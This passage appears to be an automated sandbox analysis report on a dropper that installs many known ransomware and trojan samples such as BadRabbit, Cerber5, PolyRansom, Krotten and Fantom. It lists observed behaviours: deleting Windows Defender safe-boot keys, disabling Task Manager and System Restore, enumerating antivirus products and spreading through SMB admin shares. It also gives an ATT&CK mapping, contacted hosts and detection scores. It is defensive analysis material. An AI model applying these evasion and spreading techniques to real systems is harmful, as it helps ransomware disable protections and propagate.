        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Windows\dispci.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeQueries volume information: C:\ VolumeInformation
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0040B01C GetLocalTime,11_2_0040B01C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_047757E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,12_2_047757E5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04776FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,12_2_04776FFE
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00405435 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,11_2_00405435

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefendJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefendJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiVirusProduct
        Source: Endermanch@Krotten.exe, 00000025.00000002.527795297.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Endermanch@Krotten.exe.0.drBinary or memory string: C:\WINDOWS\Cursors\avp.exe
        Source: Endermanch@Krotten.exe, 00000025.00000002.527795297.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Endermanch@Krotten.exe.0.drBinary or memory string: Photo.exeC:\WINDOWS\Cursors\avp.exe
        Source: svchost.exe, 00000008.00000002.556777241.000001AC25429000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.570072634.000001AC25502000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 0000000D.00000002.365290911.000000000178A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, type: DROPPED
        Source: Yara matchFile source: 31.0.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.0.EF39.tmp.7ff64e9a0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.2.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 31.0.EF39.tmp.7ff64e9a0000.1.unpack, type: UNPACKEDPE
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: \\192.168.2.1\admin$\infpub.datJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, type: DROPPED
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Valid Accounts
        111
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        711
        Disable or Modify Tools
        1
        Input Capture
        2
        System Time Discovery
        1
        Replication Through Removable Media
        12
        Archive Collected Data
        Exfiltration Over Other Network Medium4
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        Data Encrypted for Impact
        1
        Replication Through Removable Media
        22
        Native API
        1
        Valid Accounts
        1
        Valid Accounts
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory11
        Peripheral Device Discovery
        Remote Desktop Protocol2
        Man in the Browser
        Exfiltration Over Bluetooth21
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization11
        System Shutdown/Reboot
        Domain Accounts1
        Scheduled Task/Job
        22
        Windows Service
        11
        Access Token Manipulation
        31
        Obfuscated Files or Information
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin Shares1
        Input Capture
        Automated Exfiltration1
        Non-Standard Port
        Exploit SS7 to Track Device LocationObtain Device Cloud Backups3
        Inhibit System Recovery
        Local Accounts12
        Service Execution
        1
        Scheduled Task/Job
        22
        Windows Service
        241
        Software Packing
        NTDS348
        System Information Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer1
        Multi-hop Proxy
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCron221
        Registry Run Keys / Startup Folder
        113
        Process Injection
        1
        DLL Side-Loading
        LSA Secrets3
        Network Share Discovery
        SSHKeyloggingData Transfer Size Limits4
        Non-Application Layer Protocol
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchd3
        Bootkit
        1
        Scheduled Task/Job
        11
        File Deletion
        Cached Domain Credentials341
        Security Software Discovery
        VNCGUI Input CaptureExfiltration Over C2 Channel15
        Application Layer Protocol
        Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup Items221
        Registry Run Keys / Startup Folder
        222
        Masquerading
        DCSync31
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative Protocol2
        Proxy
        Rogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Valid Accounts
        Proc Filesystem3
        Process Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        Modify Registry
        /etc/passwd and /etc/shadow21
        Remote System Discovery
        Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)31
        Virtualization/Sandbox Evasion
        Network Sniffing11
        System Network Configuration Discovery
        Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron11
        Access Token Manipulation
        Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
        Compromise Software Supply ChainUnix ShellLaunchdLaunchd113
        Process Injection
        KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
        Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task1
        Hidden Files and Directories
        GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
        Trusted RelationshipPythonHypervisorProcess Injection3
        Bootkit
        Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement
        Hardware AdditionsJavaScript/JScriptValid AccountsDynamic-link Library Injection1
        Rundll32
        Credential API HookingSystem Information DiscoveryExploit Enterprise ResourcesRemote Email CollectionAlternate Network MediumsExternal ProxyExternal Defacement
        Masquerade as Legitimate ApplicationGraphical User InterfaceDefault AccountsPortable Executable Injection2
        Indicator Removal on Host
        Brute ForceFile and Directory DiscoveryInternal SpearphishingEmail Forwarding RuleData EncryptedMulti-hop ProxyFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 712615 Sample: 1jDe7zWnoe.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 132 recoverpcerror.com 2->132 134 powertoolsforyou.com 2->134 136 3 other IPs or domains 2->136 144 Snort IDS alert for network traffic 2->144 146 Malicious sample detected (through community Yara rule) 2->146 148 Antivirus detection for dropped file 2->148 150 19 other signatures 2->150 10 1jDe7zWnoe.exe 14 36 2->10         started        15 cmd.exe 2->15         started        17 svchost.exe 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 138 raw.githubusercontent.com 10->138 140 github.com 10->140 118 C:\...ndermanch@WinlockerVB6Blacksod.exe, PE32 10->118 dropped 120 C:\Users\user\...ndermanch@Krotten.exe, PE32 10->120 dropped 122 C:\Users\user\...ndermanch@Petya.A.exe, PE32 10->122 dropped 124 37 other malicious files 10->124 dropped 200 Writes many files with high entropy 10->200 21 Endermanch@BadRabbit.exe 2 10->21         started        25 Endermanch@InfinityCrypt.exe 10->25         started        27 Endermanch@PolyRansom.exe 10->27         started        33 8 other processes 10->33 202 Drops executables to the windows directory (C:\Windows) and starts them 15->202 29 dispci.exe 15->29         started        31 conhost.exe 15->31         started        204 Changes security center settings (notifications, updates, antivirus, firewall) 17->204 file6 signatures7 process8 dnsIp9 100 C:\Windows\infpub.dat, data 21->100 dropped 170 Multi AV Scanner detection for dropped file 21->170 36 rundll32.exe 1 3 21->36         started        40 conhost.exe 21->40         started        102 jaureg.exe.AAB132E...7D9334D6FC274E8027C, data 25->102 dropped 114 16 other malicious files 25->114 dropped 172 Antivirus detection for dropped file 25->172 174 Machine Learning detection for dropped file 25->174 176 Writes many files with high entropy 25->176 104 C:\Users\user\fakAAcAY\dekAkckQ.exe, PE32 27->104 dropped 106 C:\ProgramData\vsMwMYIk\LOAcQQUU.exe, PE32 27->106 dropped 178 Creates multiple autostart registry keys 27->178 180 Tries to evade debugger and weak emulator (self modifying code) 27->180 182 Tries to detect virtualization through RDTSC time measurements 27->182 42 LOAcQQUU.exe 27->42         started        45 dekAkckQ.exe 27->45         started        53 2 other processes 27->53 47 cmd.exe 29->47         started        49 conhost.exe 29->49         started        126 93.107.12.20, 6893 VODAFONE-IRELAND-ASNIE Ireland 33->126 128 93.107.12.21, 6893 VODAFONE-IRELAND-ASNIE Ireland 33->128 130 98 other IPs or domains 33->130 108 C:\Users\user\AppData\Roaming\...\decoder.dll, PE32 33->108 dropped 110 C:\Users\user\AppData\...\fatalerror.exe, PE32 33->110 dropped 112 C:\Users\user\AppData\Local\...\shiAB02.tmp, PE32+ 33->112 dropped 116 5 other malicious files 33->116 dropped 184 Detected unpacking (changes PE section rights) 33->184 186 Detected unpacking (overwrites its own PE header) 33->186 188 Creates an undocumented autostart registry key 33->188 190 15 other signatures 33->190 51 cmd.exe 33->51         started        55 3 other processes 33->55 file10 signatures11 process12 dnsIp13 94 C:\Windows\dispci.exe, PE32 36->94 dropped 96 C:\Windows\cscc.dat, PE32+ 36->96 dropped 98 C:\WindowsF39.tmp, data 36->98 dropped 152 System process connects to network (likely due to code injection or exploit) 36->152 154 Connects to many different private IPs via SMB (likely to spread or exploit) 36->154 156 Connects to many different private IPs (likely to spread or exploit) 36->156 168 7 other signatures 36->168 57 cmd.exe 1 36->57         started        60 cmd.exe 36->60         started        62 cmd.exe 36->62         started        66 3 other processes 36->66 158 Antivirus detection for dropped file 42->158 160 Machine Learning detection for dropped file 42->160 162 Tries to evade debugger and weak emulator (self modifying code) 42->162 142 google.com 172.217.168.14, 49727, 49732, 49743 GOOGLEUS United States 45->142 164 Tries to detect virtualization through RDTSC time measurements 45->164 68 2 other processes 47->68 166 Uses ping.exe to sleep 51->166 70 3 other processes 51->70 72 2 other processes 53->72 64 conhost.exe 55->64         started        74 2 other processes 55->74 file14 signatures15 process16 signatures17 192 Clears the journal log 57->192 194 Uses ping.exe to sleep 57->194 196 Uses schtasks.exe or at.exe to add and modify task schedules 57->196 198 Uses ping.exe to check the status of other devices and networks 57->198 76 conhost.exe 57->76         started        78 schtasks.exe 1 57->78         started        90 6 other processes 60->90 80 conhost.exe 62->80         started        82 schtasks.exe 62->82         started        84 conhost.exe 66->84         started        86 schtasks.exe 66->86         started        88 conhost.exe 66->88         started        92 2 other processes 66->92 process18

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        1jDe7zWnoe.exe64%ReversingLabsWin32.Backdoor.Bladabhindi
        1jDe7zWnoe.exe53%VirustotalBrowse
        1jDe7zWnoe.exe30%MetadefenderBrowse
        1jDe7zWnoe.exe100%AviraTR/Dropper.Gen
        1jDe7zWnoe.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe100%AviraHEUR/AGEN.1227089
